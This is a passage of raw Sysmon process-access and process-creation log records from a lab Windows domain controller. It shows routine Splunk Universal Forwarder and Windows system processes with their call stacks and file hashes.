Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005066Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:48.035{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9058-6005-1901-00000000A301}1196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005065Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:48.035{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005064Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:42:48.035{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005063Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:48.035{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005062Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:42:48.035{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005061Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:48.035{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005060Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:42:48.035{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005059Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:48.035{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005058Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:42:48.035{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005057Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:48.035{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005056Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:48.035{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9058-6005-1901-00000000A301}1196C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005055Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:48.035{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9058-6005-1901-00000000A301}1196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005054Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:48.035{59A5CD1D-9058-6005-1901-00000000A301}1196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005094Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:49.972{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9059-6005-1B01-00000000A301}3260C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005093Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:49.972{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005092Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:42:49.972{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005091Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:49.972{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005090Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:42:49.972{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005089Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:49.972{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005088Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:42:49.972{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005087Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:49.972{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005086Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:42:49.972{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005085Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:49.972{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005084Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:49.972{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9059-6005-1B01-00000000A301}3260C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005083Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:49.972{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9059-6005-1B01-00000000A301}3260C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005082Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:49.973{59A5CD1D-9059-6005-1B01-00000000A301}3260C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 
